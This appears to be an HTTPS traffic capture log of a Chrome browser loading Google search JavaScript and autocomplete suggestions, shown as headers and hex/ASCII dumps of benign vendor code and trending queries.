2024-12-04 11:20:20 UTC	3406	OUT	GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=1/ed=1/dg=3/br=1/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:21 UTC	827	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1140998 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 04 Dec 2024 11:20:16 GMT Expires: Thu, 04 Dec 2025 11:20:16 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Tue, 03 Dec 2024 22:30:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 5 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 11:20:21 UTC	563	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0// Copyright Google LLC SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Id
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 2c 6b 63 61 2c 6c 63 61 2c 6d 63 61 2c 6e 63 61 2c 6f 63 61 2c 68 63 61 2c 70 63 61 2c 65 63 61 2c 71 63 61 2c 64 63 61 2c 66 63 61 2c 67 63 61 2c 72 63 61 2c 73 63 61 2c 74 63 61 2c 44 63 61 2c 45 63 61 2c 49 63 61 2c 4a 63 61 2c 4e 63 61 2c 51 63 61 2c 4b 63 61 2c 50 63 61 2c 4f 63 61 2c 4d 63 61 2c 4c 63 61 2c 52 63 61 2c 53 63 61 2c 54 63 61 2c 56 63 61 2c 24 63 61 2c 61 64 61 2c 69 64 61 2c 6a 64 61 2c 6b 64 61 2c 6c 64 61 2c 6d 64 61 2c 6e 64 61 2c 62 64 61 2c 6f 64 61 2c 72 64 61 2c 74 64 61 2c 73 64 61 2c 76 64 61 2c 78 64 61 2c 77 64 61 2c 7a 64 61 2c 79 64 61 2c 43 64 61 2c 42 64 61 2c 44 64 61 2c 48 64 61 2c 49 64 61 2c 4c 64 61 2c 4e 64 61 2c 51 64 61 2c 52 64 61 2c 54 64 61 2c 4d 62 2c 5a 64 61 2c 62 65 61 2c 67 65 61 2c 6a 65 61 2c 6b 65 61 Data Ascii: ,kca,lca,mca,nca,oca,hca,pca,eca,qca,dca,fca,gca,rca,sca,tca,Dca,Eca,Ica,Jca,Nca,Qca,Kca,Pca,Oca,Mca,Lca,Rca,Sca,Tca,Vca,$ca,ada,ida,jda,kda,lda,mda,nda,bda,oda,rda,tda,sda,vda,xda,wda,zda,yda,Cda,Bda,Dda,Hda,Ida,Lda,Nda,Qda,Rda,Tda,Mb,Zda,bea,gea,jea,kea
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 61 2c 48 75 61 2c 49 75 61 2c 52 75 61 2c 5a 75 61 2c 24 75 61 2c 62 76 61 2c 68 76 61 2c 6b 76 61 2c 6a 76 61 2c 6c 76 61 2c 6d 76 61 2c 70 76 61 2c 73 76 61 2c 74 76 61 2c 77 76 61 2c 78 76 61 2c 79 76 61 2c 7a 76 61 2c 42 76 61 2c 41 76 61 2c 43 76 61 2c 47 76 61 2c 50 76 61 2c 51 76 61 2c 52 76 61 2c 53 76 61 2c 54 76 61 2c 55 76 61 2c 56 76 61 2c 57 76 61 2c 63 77 61 2c 65 77 61 2c 66 77 61 2c 67 77 61 2c 68 77 61 2c 69 77 61 2c 6a 77 61 2c 6b 77 61 2c 70 77 61 2c 73 77 61 2c 76 77 61 2c 78 77 61 2c 7a 77 61 2c 44 77 61 2c 45 77 61 2c 46 77 61 2c 47 77 61 2c 4a 77 61 2c 4b 77 61 2c 4d 77 61 2c 50 77 61 2c 4e 77 61 2c 5a 77 61 2c 66 78 61 2c 69 78 61 2c 68 78 61 2c 6b 78 61 2c 6c 78 61 2c 6d 78 61 2c 6e 78 61 2c 4e 68 2c 6f 78 61 2c 77 78 61 2c 78 78 Data Ascii: a,Hua,Iua,Rua,Zua,$ua,bva,hva,kva,jva,lva,mva,pva,sva,tva,wva,xva,yva,zva,Bva,Ava,Cva,Gva,Pva,Qva,Rva,Sva,Tva,Uva,Vva,Wva,cwa,ewa,fwa,gwa,hwa,iwa,jwa,kwa,pwa,swa,vwa,xwa,zwa,Dwa,Ewa,Fwa,Gwa,Jwa,Kwa,Mwa,Pwa,Nwa,Zwa,fxa,ixa,hxa,kxa,lxa,mxa,nxa,Nh,oxa,wxa,xx
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 65 6e 67 74 68 3f 64 3a 64 2e 73 75 62 61 72 72 61 79 28 30 2c 63 29 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 61 3b 7d 2c 30 29 7d 3b 5f 2e 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 63 61 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 69 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 68 61 61 3f 5f 2e 66 61 3f 5f 2e 66 61 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 5f 2e 68 61 28 62 2c 61 29 7d 29 3a Data Ascii: ength?d:d.subarray(0,c)}return a};_.da=function(a){_.ca.setTimeout(function(){throw a;},0)};_.ea=function(){var a=_.ca.navigator;return a&&(a=a.userAgent)?a:""};iaa=function(a){return _.haa?_.fa?_.fa.brands.some(function(b){return(b=b.brand)&&_.ha(b,a)}):
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 2f 72 76 3a 20 2a 28 5b 5c 64 5c 2e 5d 2a 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 62 26 26 62 5b 31 5d 29 72 65 74 75 72 6e 20 62 5b 31 5d 3b 62 3d 22 22 3b 76 61 72 20 63 3d 2f 4d 53 49 45 20 2b 28 5b 5c 64 5c 2e 5d 2b 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 69 66 28 61 3d 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 63 5b 31 5d 3d 3d 22 37 2e 30 22 29 69 66 28 61 26 26 61 5b 31 5d 29 73 77 69 74 63 68 28 61 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 62 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 35 2e 30 22 3a 62 3d 22 39 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 36 2e 30 22 3a 62 3d 22 31 30 2e 30 22 3b 62 72 65 Data Ascii: function(a){var b=/rv: ([\d\.])/.exec(a);if(b&&b[1])return b[1];b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),c[1]=="7.0")if(a&&a[1])switch(a[1]){case "4.0":b="8.0";break;case "5.0":b="9.0";break;case "6.0":b="10.0";bre
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 4d 61 63 69 6e 74 6f 73 68 22 29 7d 3b 5f 2e 7a 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 4c 69 6e 75 78 22 3a 5f 2e 6c 61 28 22 4c 69 6e 75 78 22 29 7d 3b 5f 2e 41 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 57 69 6e 64 6f 77 73 22 3a 5f 2e 6c 61 28 22 57 69 6e 64 6f 77 73 22 29 7d 3b 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 43 68 72 6f 6d 65 20 4f 53 22 3a 5f 2e 6c 61 28 22 43 72 4f 53 22 29 7d 3b 0a 5f 2e 43 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 65 61 28 29 Data Ascii: Macintosh")};_.zaa=function(){return waa()?_.fa.platform==="Linux":_.la("Linux")};_.Aaa=function(){return waa()?_.fa.platform==="Windows":_.la("Windows")};Baa=function(){return waa()?_.fa.platform==="Chrome OS":_.la("CrOS")};_.Caa=function(){var a=_.ea()
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 28 61 2c 62 29 3e 3d 30 7d 3b 5f 2e 44 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 43 61 28 61 2c 62 29 7c 7c 61 2e 70 75 73 68 28 62 29 7d 3b 5f 2e 46 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 42 61 28 61 2c 62 29 3b 76 61 72 20 63 3b 28 63 3d 62 3e 3d 30 29 26 26 5f 2e 45 61 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 63 7d 3b 5f 2e 45 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 31 29 2e 6c 65 6e 67 74 68 3d 3d 31 7d 3b 0a 5f 2e 47 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 30 3b 5f 2e 79 61 28 61 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 Data Ascii: (a,b)>=0};_.Da=function(a,b){_.Ca(a,b)\|\|a.push(b)};_.Fa=function(a,b){b=_.Ba(a,b);var c;(c=b>=0)&&_.Ea(a,b);return c};_.Ea=function(a,b){return Array.prototype.splice.call(a,b,1).length==1};_.Gaa=function(a,b){var c=0;_.ya(a,function(d,e){b.call(void 0,d
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 2e 6c 65 6e 67 74 68 21 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 3b 63 3d 63 7c 7c 4e 61 61 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 69 66 28 21 63 28 61 5b 65 5d 2c 62 5b 65 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 4c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3e 62 3f 31 3a 61 3c 62 3f 2d 31 3a 30 7d 3b 4e 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 0a 5f 2e 4f 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d 3b 5f 2e 51 61 28 61 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 63 5b 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 61 29 Data Ascii: .length!=b.length)return!1;var d=a.length;c=c\|\|Naa;for(var e=0;e<d;e++)if(!c(a[e],b[e]))return!1;return!0};_.Laa=function(a,b){return a>b?1:a<b?-1:0};Naa=function(a,b){return a===b};_.Oaa=function(a,b){var c={};_.Qa(a,function(d,e){c[b.call(void 0,d,e,a)
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 63 21 3d 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 61 5b 64 5d 21 3d 3d 62 5b 64 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 61 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 65 6e 67 74 68 3d 3d 30 3f 5f 2e 56 61 28 29 3a 6e 65 77 20 5f 2e 57 61 28 61 2c 5f 2e 59 61 29 7d 3b 0a 63 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 72 65 74 75 72 6e 7b 62 75 66 66 65 72 3a 59 61 61 28 61 29 2c 6b 55 3a 21 31 7d 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 Data Ascii: aa=function(a,b){var c=a.length;if(c!==b.length)return!1;for(var d=0;d<c;d++)if(a[d]!==b[d])return!1;return!0};_.aba=function(a){return a.length==0?_.Va():new _.Wa(a,_.Ya)};cba=function(a){if(typeof a==="string")return{buffer:Yaa(a),kU:!1};if(Array.isArr
2024-12-04 11:20:21 UTC	1390	IN	Data Raw: 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 5b 63 5d 2c 65 3d 62 5b 63 5d 3b 69 66 28 64 3e 65 29 72 65 74 75 72 6e 21 31 3b 69 66 28 64 3c 65 29 72 65 74 75 72 6e 21 30 7d 7d 3b 6f 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 3e 3e 3e 30 3b 5f 2e 64 62 3d 62 3b 5f 2e 65 62 3d 28 61 2d 62 29 2f 34 32 39 34 39 36 37 32 39 36 3e 3e 3e 30 7d 3b 0a 5f 2e 67 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3c 30 29 7b 6f 62 61 28 2d 61 29 3b 76 61 72 20 62 3d 5f 2e 66 62 28 70 62 61 28 5f 2e 64 62 2c 5f 2e 65 62 29 29 3b 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 5f 2e 64 62 3d 61 3e 3e 3e 30 3b 5f 2e 65 62 3d 62 3e 3e 3e 30 7d 65 6c Data Ascii: r c=0;c<a.length;c++){var d=a[c],e=b[c];if(d>e)return!1;if(d<e)return!0}};oba=function(a){var b=a>>>0;_.db=b;_.eb=(a-b)/4294967296>>>0};_.gb=function(a){if(a<0){oba(-a);var b=_.fb(pba(_.db,_.eb));a=b.next().value;b=b.next().value;_.db=a>>>0;_.eb=b>>>0}el

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:20 UTC	1392	OUT	GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=7TpQZ5ybCP7V7M8PhYbCIQ.1733311218355&dpr=1&nolsbt=1 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:21 UTC	1305	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Date: Wed, 04 Dec 2024 11:20:21 GMT Expires: Wed, 04 Dec 2024 11:20:21 GMT Cache-Control: private, max-age=3600 Content-Type: application/json; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pTY6Z-XTrrW90JqYffZBjQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-04 11:20:21 UTC	85	IN	Data Raw: 33 39 64 0d 0a 29 5d 7d 27 0a 5b 5b 5b 22 68 6f 77 20 74 6f 20 67 65 74 20 73 69 6e 69 73 74 65 61 20 70 6f 6b c3 a9 6d 6f 6e 20 67 6f 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 Data Ascii: 39d)]}'[[["how to get sinistea pokmon go",0,[3,362,143],{"zf":33,"zl":8,"zp":{"g
2024-12-04 11:20:21 UTC	847	IN	Data Raw: 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 73 6e 6f 77 20 73 74 6f 72 6d 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 6d 69 63 68 69 67 61 6e 20 66 6f 6f 74 62 61 6c 6c 20 72 65 63 72 75 69 74 69 6e 67 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 75 62 69 73 6f 66 74 20 73 68 75 74 74 69 6e 67 20 64 6f 77 6e 20 78 64 65 66 69 61 6e 74 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 Data Ascii: s_ss":"1"}}],["snow storm weather forecast",0,[3,362,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["michigan football recruiting",0,[3,362,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["ubisoft shutting down xdefiant",0,[3,362,143],{"zf":33,"zl":8,"zp":{"gs_ss"
2024-12-04 11:20:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:21 UTC	1632	OUT	GET /xjs/_/js/md=2/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:21 UTC	816	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 9362 Date: Wed, 04 Dec 2024 11:20:21 GMT Expires: Thu, 04 Dec 2025 11:20:21 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Tue, 03 Dec 2024 22:30:27 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
